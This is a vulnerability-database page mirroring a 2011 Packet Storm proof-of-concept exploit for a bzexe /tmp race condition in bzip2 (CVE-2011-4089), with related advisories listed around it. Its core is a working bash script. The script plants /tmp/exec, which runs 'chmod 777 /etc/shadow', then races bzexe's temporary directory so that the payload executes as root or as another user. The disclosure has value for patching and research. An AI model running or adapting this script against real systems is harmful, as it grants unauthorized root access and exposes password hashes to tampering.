Lucene search

K

bzexe /tmp Race Condition

🗓️ 06 Nov 2011 00:00:00Reported by Larry W. CashdollarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Exploit through 'bzexe /tmp Race Condition'

Show more
Related
Code
ReporterTitlePublishedViews
Family
OpenVAS
Ubuntu Update for bzip2 USN-1308-1
16 Dec 201100:00
openvas
OpenVAS
Ubuntu: Security Advisory (USN-1308-1)
16 Dec 201100:00
openvas
Prion
Directory traversal
16 Apr 201418:37
prion
RedhatCVE
CVE-2011-4089
30 Oct 201510:27
redhatcve
securityvulns
[USN-1308-1] bzip2 vulnerability
19 Dec 201100:00
securityvulns
securityvulns
bzip2 bzexe symbolic links vulnerability
19 Dec 201100:00
securityvulns
UbuntuCve
CVE-2011-4089
29 Oct 201100:00
ubuntucve
Debian CVE
CVE-2011-4089
16 Apr 201418:37
debiancve
Cvelist
CVE-2011-4089
16 Apr 201418:00
cvelist
Ubuntu
bzip2 vulnerability
14 Dec 201100:00
ubuntu
Rows per page
`Hi Packetstorm,  
  
This PoC exploit was developed after a discussion on Full-disclosure  
mailing list, where  
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=632862  
was proved to be exploitable. A user can wait until a binary that was  
compressed with bzexe is run by root and execute /tmp/exec. This  
could be used  
to gain access as any user executing bzexe compressed binary as well.  
  
It's probably not common to have binaries compressed unless your on an  
imbedded system.  
  
---- Begin------  
#!/bin/bash  
#gain root on a system using bzexe to compress binaries  
#/tmp/exec will be executed as user executing if we win the race.  
#Larry W. Cashdollar http://www.downspout.org (credit vladz with discovery)  
#http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=632862  
#create /tmp/exec before hand  
  
#echo "Creating malicious script."  
  
echo "#!/bin/sh" > /tmp/exec  
echo "chmod 777 /etc/shadow" >> /tmp/exec  
chmod 755 /tmp/exec  
  
mkdir /tmp/$1  
while true ;  
do  
if [ -a /tmp/$1/gztmp* ]  
then  
# echo "Exploting bzexe."  
mv /tmp/$1 /tmp/$1.dir  
# echo "Copying our evil code into place."  
cp /tmp/exec /tmp/$1  
fi  
done  
  
  
--- End---  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo